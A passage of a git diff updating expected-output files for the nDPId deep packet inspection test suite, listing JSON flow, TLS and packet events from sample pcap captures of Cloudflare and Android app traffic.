{"version":"TLSv1.3","client_requested_server_name":"951c558a-5e07-47ca-a0c0-225da1b33163.is-doh.help.every1dns.net","ja3":"aa7744226c695c0b2e440419848cf700","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00921{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":944,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1604822447287,"flow_last_seen":1604822447500,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2172,"flow_avg_l4_payload_len":362,"midstream":0,"thread_ts_msec":1604822447500,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51637,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"","ja3":"62a4a00de930bd0a5bee0309cc8362ed","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00921{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":948,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1604822447287,"flow_last_seen":1604822447506,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2172,"flow_avg_l4_payload_len":362,"midstream":0,"thread_ts_msec":1604822447506,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51639,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"","ja3":"62a4a00de930bd0a5bee0309cc8362ed","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00921{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":952,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1604822447287,"flow_last_seen":1604822447515,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2172,"flow_avg_l4_payload_len":362,"midstream":0,"thread_ts_msec":1604822447515,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51638,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"","ja3":"62a4a00de930bd0a5bee0309cc8362ed","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1604822447287,"flow_last_seen":1604822447869,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":7366,"flow_avg_l4_payload_len":210,"midstream":0,"thread_ts_msec":1604822448604,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51637,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}} +00690{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1604822447287,"flow_last_seen":1604822447844,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4320,"flow_avg_l4_payload_len":196,"midstream":0,"thread_ts_msec":1604822448604,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51638,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}} +00690{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1604822447287,"flow_last_seen":1604822447839,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4320,"flow_avg_l4_payload_len":196,"midstream":0,"thread_ts_msec":1604822448604,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51639,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}} +00653{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1604822444474,"flow_last_seen":1604822444595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":9,"midstream":1,"thread_ts_msec":1604822448604,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.249.249","src_port":51331,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1604822444474,"flow_last_seen":1604822444595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":9,"midstream":1,"thread_ts_msec":1604822448604,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.249.249","src_port":51331,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":268,"flow_first_seen":1604822444486,"flow_last_seen":1604822448523,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":682,"flow_tot_l4_payload_len":17062,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1604822448604,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.249.249","src_port":51606,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":785,"flow_first_seen":1604822444913,"flow_last_seen":1604822448604,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":480607,"flow_avg_l4_payload_len":612,"midstream":0,"thread_ts_msec":1604822448604,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.124.96","src_port":51612,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1604822447227,"flow_last_seen":1604822447785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4696,"flow_avg_l4_payload_len":204,"midstream":0,"thread_ts_msec":1604822448604,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.17.198.37","src_port":51635,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1604822447249,"flow_last_seen":1604822447807,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4696,"flow_avg_l4_payload_len":204,"midstream":0,"thread_ts_msec":1604822448604,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.17.198.37","src_port":51636,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}} 00560{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","packets-captured":1185,"packets-processed":1185,"total-skipped-flows":0,"total-l4-data-len":523130,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":7,"total-detection-updates":7,"total-updates":0,"current-active-flows":0,"total-active-flows":8,"total-idle-flows":8,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":58,"global_ts_msec":1604822448604} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 1185/1185 diff --git a/test/results/ocs.pcap.out b/test/results/ocs.pcap.out index 0f785e40f..8a6b2b90e 100644 --- a/test/results/ocs.pcap.out +++ b/test/results/ocs.pcap.out @@ -1,1910 +1,123 @@ 00454{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"ocs.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00540{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"ocs.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1449652784341} -00169{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":1,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652784341} -00328{"packet_event_id":1,"packet_event_name":"packet","packet_id":1,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAPKbzQABABiV4wKi0AkDpuLy6UxRsAv3YCQAAAACgAjkIdPYAAAIEBbQEAggKADWBtgAAAAABAwMG"} -00169{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":2,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652786071} -00332{"packet_event_id":1,"packet_event_name":"packet","packet_id":2,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":63,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":63,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAP4JiQABAETORwKi0AggICAiWSAA1ACtxaqbPAQAAAQAAAAAAAAVvY3UwMwhsYWJnZW5jeQJ3cwAAAQAB"} -00169{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":3,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652786098} -00344{"packet_event_id":1,"packet_event_name":"packet","packet_id":3,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":70,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":70,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAARoJmQABAETOGwKi0AggICAicoQA1ADK8OQlbAQAAAQAAAAAAAAhzZXR0aW5ncwtjcmFzaGx5dGljcwNjb20AAAEAAQ=="} -00169{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":4,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652786130} -00340{"packet_event_id":1,"packet_event_name":"packet","packet_id":4,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":67,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":67,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQ4JpQABAETOGwKi0AggICAgFCwA1AC+TFZykAQAAAQAAAAAAAANhcGkEZXUwMQhjYXBwdGFpbgNjb20AAAEAAQ=="} -00169{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":5,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652786135} -00328{"packet_event_id":1,"packet_event_name":"packet","packet_id":5,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAPJwfQABABqbCwKi0ArL40Da8egBQwI4edgAAAACgAjkI+LAAAAIEBbQEAggKADWCaQAAAAABAwMG"} -00169{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":6,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652786152} -00328{"packet_event_id":1,"packet_event_name":"packet","packet_id":6,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAPCFLQABABqbpwKi0AhcV5seZXwG7KAKjIAAAAACgAjkIs5MAAAIEBbQEAggKADWCawAAAAABAwMG"} -00169{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":7,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652786167} -00328{"packet_event_id":1,"packet_event_name":"packet","packet_id":7,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAPOubQABABs8fwKi0AomHgc7QbABQfGRp9gAAAACgAjkIVT4AAAIEBbQEAggKADWCbQAAAAABAwMG"} -00169{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":8,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652786190} -00321{"packet_event_id":1,"packet_event_name":"packet","packet_id":8,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANJwgQABABqbJwKi0ArL40Da8egBQwI4ed\/tL3mKAEADlQqoAAAEBCAoANYJvRwX8Kg=="} -00169{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":9,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652786215} -01352{"packet_event_id":1,"packet_event_name":"packet","packet_id":9,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":824,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":824,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQADOJwhQABABqPEwKi0ArL40Da8egBQwI4ed\/tL3mKAGADlWgkAAAEBCAoANYJxRwX8KlBPU1QgL2NhdGFsb2cvdm9kP3Y9MyBIVFRQLzEuMQ0KWC1MZ3ktSHNzLUE6IEZGRTg2OUEyLTMzQUQtQTU0QS1CRUMwLTcyMTBEMDNDODM1Qi0yNTk0RDYzRA0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQpYLUxneS1IU1MtU2VydmljZS1JZDogb2ZyLm9jcw0KWC1MZ3ktSFNTLVJvbS1JZDogc2Ftc3VuZy9HVC1QNzUxMC9BbmRyb2lkLzQuMC40L1hXTFA2L2FybXY3bF8xMDAwLjBNSHpfMTk5OC44NEJvZ29NaXBzX2ZlYXR1cmVzKHN3cCxoYWxmLHRodW1iLGZhc3RtdWx0LHZmcCxlZHNwLHZmcHYzLHZmcHYzZDE2LHRscylfY29yZXM9Mi8xMjgweDc1Mi9mYWxzZQ0KQ29udGVudC1MZW5ndGg6IDIzNA0KSG9zdDogb2N1MDMubGFiZ2VuY3kud3MNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChMaW51eDsgVTsgQW5kcm9pZCA0LjAuNDsgZnItZnI7IEdULVA3NTEwIEJ1aWxkL0lNTTc2RCkgQXBwbGVXZWJLaXQvNTM0LjMwIChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgU2FmYXJpLzUzNC4zMA0KDQo8P3htbCB2ZXJzaW9uPSIxLjAiIGVuY29kaW5nPSJVVEYtOCI\/Pgo8bGd5cmVxdWVzdCBtb2R1bGU9IkNNL1ZPRCI+Cgk8YWN0aW9uIG5hbWU9ImluaXQiPgoJCTxwYXJhbSBuYW1lPSJzY3JlZW5TaXplIiB2YWx1ZT0iIi8+CgkJPHBhcmFtIG5hbWU9InRpbWVzdGFtcCIgdmFsdWU9IjAiLz4KCQk8cGFyYW0gbmFtZT0iYXBwLXZlcnNpb24iIHZhbHVlPSIxLjQuNyIvPgoJPC9hY3Rpb24+CjwvbGd5cmVxdWVzdD4="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":10,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652786268} -00321{"packet_event_id":1,"packet_event_name":"packet","packet_id":10,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANOucQABABs8mwKi0AomHgc7QbABQfGRp97oFwGaAEADlOEAAAAEBCAoANYJ3vXlL7A=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":11,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652786271} -00535{"packet_event_id":1,"packet_event_name":"packet","packet_id":11,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":211,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":211,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAA0+udQABABs6GwKi0AomHgc7QbABQfGRp97oFwGaAGADl3TMAAAEBCAoANYJ3vXlL7EdFVCAveG1wcC1kaXNjbz9kZXZpY2VpZD1mMmM5OTNkNjIxOGY1ZTIyZmUyODRiMmU5MGM4MmYzYiZwdXNoX29uX2RldmljZT10cnVlJmFwcGlkPW9jczAwMDAwMyBIVFRQLzEuMQ0KSG9zdDogYXBpLmV1MDEuY2FwcHRhaW4uY29tDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":12,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652786326} -00321{"packet_event_id":1,"packet_event_name":"packet","packet_id":12,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANOueQABABs8kwKi0AomHgc7QbABQfGRqlroFwe2AEAD1NewAAAEBCAoANYJ9vXlMBA=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":13,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652786328} -00321{"packet_event_id":1,"packet_event_name":"packet","packet_id":13,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANOufQABABs8jwKi0AomHgc7QbABQfGRqlroFwe2AEQD1NesAAAEBCAoANYJ9vXlMBA=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":14,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652786395} -00330{"packet_event_id":1,"packet_event_name":"packet","packet_id":14,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAPGAaQABABlqhwKi0AomHgc6vnwBQfAzimQAAAACgAjkI\/akAAAIEBbQEAggKADWCgwAAAAABAwMG"} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":15,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652786398} -00321{"packet_event_id":1,"packet_event_name":"packet","packet_id":15,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANOugQABABs8iwKi0AomHgc7QbABQfGRql7oFwe6AEAD1NdYAAAEBCAoANYKEvXlMEQ=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":16,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652786451} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":16,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANJwiQABABqbHwKi0ArL40Da8egBQwI4he\/tL486AEAESObkAAAEBCAoANYKJRwX8ZA=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":17,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652786452} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":17,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANJwjQABABqbGwKi0ArL40Da8egBQwI4he\/tL5zyAEAE9NiAAAAEBCAoANYKJRwX8ZA=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":18,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652786500} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":18,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANGAbQABABlqowKi0AomHgc6vnwBQfAzimh3f\/xqAEADlPeYAAAEBCAoANYKOvXlMIw=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":19,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652786501} -00436{"packet_event_id":1,"packet_event_name":"packet","packet_id":19,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":136,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":136,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAiGAcQABABlpTwKi0AomHgc6vnwBQfAzimh3f\/xqAGADlKR0AAAEBCAoANYKOvXlMI0dFVCAvaXAtdG8tY291bnRyeSBIVFRQLzEuMQ0KSG9zdDogYXBpLmV1MDEuY2FwcHRhaW4uY29tDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":20,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652786934} -00345{"packet_event_id":1,"packet_event_name":"packet","packet_id":20,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASIK5QABAETMxwKi0AggICAi+ggA1ADS3+1EXAQAAAQAAAAAAAAdhbmRyb2lkB2NsaWVudHMGZ29vZ2xlA2NvbQAAAQAB"} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":21,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652786975} -00436{"packet_event_id":1,"packet_event_name":"packet","packet_id":21,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":136,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":136,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAiGAdQABABlpSwKi0AomHgc6vnwBQfAzimh3f\/xqAGADlKO0AAAEBCAoANYK+vXlMI0dFVCAvaXAtdG8tY291bnRyeSBIVFRQLzEuMQ0KSG9zdDogYXBpLmV1MDEuY2FwcHRhaW4uY29tDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":22,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652787003} -00329{"packet_event_id":1,"packet_event_name":"packet","packet_id":22,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAPLBhQABABm1GwKi0Atg60C6hBwG7mRQyoQAAAACgAjkIAHcAAAIEBbQEAggKADWCwAAAAAABAwMG"} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":23,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652787075} -00321{"packet_event_id":1,"packet_event_name":"packet","packet_id":23,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANLBiQABABm1NwKi0Atg60C6hBwG7mRQyouLMvMiAEADlCc8AAAEBCAoANYLHGASl5Q=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":24,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652787100} -00568{"packet_event_id":1,"packet_event_name":"packet","packet_id":24,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":236,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":236,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAA7LBjQABABmyUwKi0Atg60C6hBwG7mRQyouLMvMiAGADlzvUAAAEBCAoANYLKGASl5RYDAQCzAQAArwMBVmhd8vjfjZbbQQM2P+6kSvFiVrQbP+1p3IwwDXzkWPQAAEYABAAFAC8ANcACwATABcAMwA7AD8AHwAnACsARwBPAFAAzADkAMgA4AArAA8ANwAjAEgAWABMACQAVABIAAwAIABQAEQD\/AQAAQAALAAQDAAECAAoANAAyAAEAAgADAAQABQAGAAcACAAJAAoACwAMAA0ADgAPABAAEQASABMAFAAVABYAFwAYABk="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":25,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652787155} 